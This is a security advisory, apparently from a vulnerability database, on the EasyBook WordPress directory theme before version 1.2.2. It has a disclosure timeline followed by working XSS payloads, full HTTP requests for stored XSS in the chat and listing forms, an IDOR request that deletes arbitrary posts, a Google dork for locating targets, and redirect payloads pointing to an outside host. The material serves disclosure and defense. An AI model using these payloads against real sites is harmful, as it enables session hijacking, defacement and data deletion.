EasyBook < 1.2.2 - Multiple Vulnerabilities

2020-01-1000:00:00

m0ze

0.009 Low

EPSS

Percentile

83.2%

JSON

Multiple vulnerabilities was discovered in the ‘EasyBook – Directory & Listing WordPress Theme’, tested version — v1.2.1: - Unauthenticated Reflected XSS - Authenticated Persistent XSS - IDOR December 27th, 2019 - Envato Contacted January 6th, 2020 - Envato Investigating January ??th, 2020 - Theme has been removed from Envato January 8th, 2020 - v1.2.2 released January 10th, 2020 - Theme put back on Envato

----[]- Info: -[]----
Demo website: https://www.easybook.cththemes.org/
Demo account: m0ze2/asdasd (login/password)
PoC listing: https://www.easybook.cththemes.org/dashboard/#/listingsPending
Google Dork: /wp-content/themes/easybook/
Date: 27/12/2019


----[]- Reflected XSS: -[]----
Input field with placeholder «Hotel , City...» on the homepage is vulnerable. Same thing with a regular search (block under the «Add Listing» button).

Payload Sample #0: <img src=x onerror=alert(document.cookie)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC #0: https://www.easybook.cththemes.org/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&checkin=&checkout=&adults=1&children=0

PoC #1: https://www.easybook.cththemes.org/?search_term=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&checkin=&checkout=&adults=1&children=0


----[]- Persistent XSS -> Chat: -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://www.easybook.cththemes.org/dashboard/#/chats or from chat widget on the bottom right corner).

Payload Sample #0: <img src=x onerror=alert(`m0ze`)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: _your_cookies_here_

action=easybook_addons_chat_reply&_nonce=1c8cd14288&cid=600&user_id=XXX&touid=1&reply_text=_payload_

Where:
user_id=XXX (your unique WordPress ID);
touid=1 (message receiver ID, in this example ID 1 == account «admin»);
reply_text=_payload_ (your payload).


----[]- Persistent XSS -> Listing page: -[]----
Add new listing here https://www.easybook.cththemes.org/dashboard/#/addListing (first time you need to order a «Free» plan and go to this URL again).
Vulnerable input fields: «Address», «Longitude», «Latitude», «Fact Title» and «Fact Number».

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------970149683563
Content-Length: 4142
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: _your_cookies_here_

-----------------------------970149683563
Content-Disposition: form-data; name="lid"

0
-----------------------------970149683563
Content-Disposition: form-data; name="listing_type_id"

5058
-----------------------------970149683563
Content-Disposition: form-data; name="isSubmit"

true
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[timezone]"

America/New_York
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Monday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Tuesday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Wednesday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Thursday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Friday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Saturday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="working_hours[Sunday][static]"

enterHours
-----------------------------970149683563
Content-Disposition: form-data; name="locations"

US|M
-----------------------------970149683563
Content-Disposition: form-data; name="title"

PoC
-----------------------------970149683563
Content-Disposition: form-data; name="address"

"><img src=x onerror=alert(1)>
-----------------------------970149683563
Content-Disposition: form-data; name="longitude"

"><img src=x onerror=alert(2)>
-----------------------------970149683563
Content-Disposition: form-data; name="latitude"

"><img src=x onerror=alert(3)>
-----------------------------970149683563
Content-Disposition: form-data; name="author_email"

M
-----------------------------970149683563
Content-Disposition: form-data; name="author_phone"

M
-----------------------------970149683563
Content-Disposition: form-data; name="author_website"

M
-----------------------------970149683563
Content-Disposition: form-data; name="content"

"><img src=x onerror=alert(document.domain)>
-----------------------------970149683563
Content-Disposition: form-data; name="features[0]"

303
-----------------------------970149683563
Content-Disposition: form-data; name="features[1]"

300
-----------------------------970149683563
Content-Disposition: form-data; name="features[2]"

305
-----------------------------970149683563
Content-Disposition: form-data; name="features[3]"

302
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][title]"

"><img src=x onerror=alert(9)>
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][number]"

"><img src=x onerror=alert(10)>
-----------------------------970149683563
Content-Disposition: form-data; name="facts[0][icon]"

123
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_id]"

-imgsrcxonerroralert12
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_name]"

M
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_desc]"

M
-----------------------------970149683563
Content-Disposition: form-data; name="lservices[0][service_price]"

0
-----------------------------970149683563
Content-Disposition: form-data; name="action"

submit_listing
-----------------------------970149683563
Content-Disposition: form-data; name="_wpnonce"

1c8cd14288
-----------------------------970149683563--


----[]- IDOR: -[]----
Delete any post/page/listing:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.easybook.cththemes.org
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: https://www.easybook.cththemes.org
DNT: 1
Connection: close
Referer: https://www.easybook.cththemes.org/dashboard/
Cookie: _your_cookies_here_

action=easybook_addons_delete_listing&_nonce=1c8cd14288&lid=XXXX

Where:
lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).